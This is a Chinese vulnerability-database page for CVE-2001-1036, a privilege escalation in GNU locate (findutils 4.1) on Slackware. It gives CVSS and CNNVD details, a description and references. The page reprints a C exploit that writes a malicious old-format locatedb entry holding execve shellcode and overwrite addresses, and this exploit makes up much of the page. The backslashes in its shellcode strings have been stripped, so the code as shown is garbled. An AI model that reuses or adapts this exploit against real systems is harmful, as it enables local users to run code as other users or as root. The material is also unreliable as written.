Slackware findutils GNU locate权限提升漏洞

Slackware findutils GNU locate权限提升漏洞

漏洞ID 1106455 漏洞类型 未知
发布时间 2001-08-01 更新时间 2005-05-02
图片[1]-Slackware findutils GNU locate权限提升漏洞-安全小百科CVE编号 CVE-2001-1036
图片[2]-Slackware findutils GNU locate权限提升漏洞-安全小百科CNNVD-ID CNNVD-200108-173
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/21043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-173
|漏洞详情
Slackware7.1和8.0上的findutils4.1的GNUlocate存在漏洞。本地用户可以借助原有规格化数据库(locatedb)文件名获取权限,其中包含带有out-of-range偏移的一个条目,该漏洞可能导致locate写入任意内存进程。
|漏洞EXP
source: http://www.securityfocus.com/bid/3127/info

GNU locate is an application that searches file databases for file names that match user-supplied patterns.

A boundary condition error can occur when the program reads database files composed in an "old" format, produced by GNU locate prior to version 4.0 and by Unix versions of locate and find. If an attacker is able to write a malicious entry to a database file used by other users, the attacker could cause arbitrary code to be executed by another user when the user runs the locate program.

It also should be noted that in earlier versions of Slackware(circa 3.5) the file is written by the superuser. 

#include <stdio.h>

char shellcode[] =
   "xebx18x5ex89x76x08x31xc0x88x46x07x89x46"
   "x0cx89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80"
   "xe8xe3xffxffxff/tmp/xx";
char putshell[] =
   "x14x84x85x86x87x88x89x8ax8bx8c"
   "x8dx8ex8fx90x91x92x93x94x95x96";

int main(void)
{
   int i;
   int z0=0; int addr=0x0804a970;
   int z1=0; int addr2=-626;
   int z2=0; int addr3=addr+6;
   printf("%s", &addr);
   printf("%s", &addr3);
   printf("%s",shellcode);
   fflush(stdout);
   for(i=46;i<256;i++) putchar('A');
   printf("%s", putshell);
   fflush(stdout);
   putchar(0);
   putchar(30);
   printf("%s", &addr2);
   printf("x82x83");
   fflush(stdout);
}
|参考资料

来源:XF
名称:locate-command-execution(6932)
链接:http://xforce.iss.net/static/6932.php
来源:BID
名称:3127
链接:http://www.securityfocus.com/bid/3127
来源:BUGTRAQ
名称:20010801Slackware8.0,7.1Vulnerability:/usr/bin/locate
链接:http://www.securityfocus.com/archive/1/200991
来源:OSVDB
名称:5477
链接:http://www.osvdb.org/5477

相关推荐: 2Wire HomePortal Series Directory Traversal Vulnerability

2Wire HomePortal Series Directory Traversal Vulnerability 漏洞ID 1098983 漏洞类型 Input Validation Error 发布时间 2004-01-20 更新时间 2004-01-20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享